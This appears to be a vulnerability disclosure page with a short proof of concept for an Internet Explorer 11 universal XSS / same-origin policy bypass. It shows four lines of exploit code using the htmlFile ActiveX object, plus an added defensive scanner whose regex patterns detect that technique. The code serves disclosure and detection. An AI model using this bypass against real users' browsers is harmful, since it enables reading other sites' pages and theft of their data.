IE11 - UXSS / SOP Bypass


Below is an iframe pointing to brokenbrowser.com that can access the DOM of this top window, bypassing the same-origin policy (SOP).




The code inside the iframe is simple:

doc = new ActiveXObject("htmlFile");
win = doc.Script; // window object of the above document
win.opener = top; // pass a reference to the top window
win.execScript("alert(opener.document.URL)"); // Full SOP bypass
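
For defenders reviewing captured page or script content, the following is an added example (not code from this page's author) that flags the htmlFile pattern shown above. The indicator ids, verdict names and sample input are constructed for illustration, and the check is a static text heuristic, so it only sees script that is present in the source it is given.

```javascript
// Added example: static triage of script text for the htmlFile pattern.
// Indicator ids, verdict names and sample inputs are constructed.

// Fold "a" + 'b' literal concatenations so a split ProgID still matches.
function foldLiterals(src) {
  const join = /(["'])((?:(?!\1)[^\\\n])*)\1\s*\+\s*(["'])((?:(?!\3)[^\\\n])*)\3/;
  let prev;
  do {
    prev = src;
    src = src.replace(join, (m, q1, a, q2, b) => JSON.stringify(a + b));
  } while (src !== prev);
  return src;
}

const INDICATORS = [
  // ProgIDs are case-insensitive, so "htmlFile" and "HTMLFILE" both count.
  { id: "htmlfile-activex", re: /new\s+ActiveXObject\s*\(\s*["']htmlfile["']\s*\)/i },
  // Property names below are matched as written on this page.
  { id: "script-window", re: /\.Script\b/ },
  { id: "opener-assigned", re: /\.opener\s*=(?!=)/ },
  { id: "execscript", re: /\.execScript\s*\(/ },
];

// Returns which indicators appear and a verdict:
//   "match"  = htmlFile object created and at least one follow-on step seen
//   "review" = htmlFile object created, nothing else seen
//   "clean"  = no htmlFile object created
function scan(source) {
  const folded = foldLiterals(source);
  const hits = INDICATORS.filter((i) => i.re.test(folded)).map((i) => i.id);
  let verdict = "clean";
  if (hits.includes("htmlfile-activex")) {
    verdict = hits.length > 1 ? "match" : "review";
  }
  return { verdict, hits };
}

// Constructed input: the four lines shown on this page.
const pageSample = [
  'doc = new ActiveXObject("htmlFile");',
  "win = doc.Script;",
  "win.opener = top;",
  'win.execScript("alert(opener.document.URL)");',
].join("\n");

console.log(scan(pageSample));
```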




If you have questions, contact me here: @magicmac2000
For more information about this vulnerability, see: UXSS IE ActiveXObject/htmlFile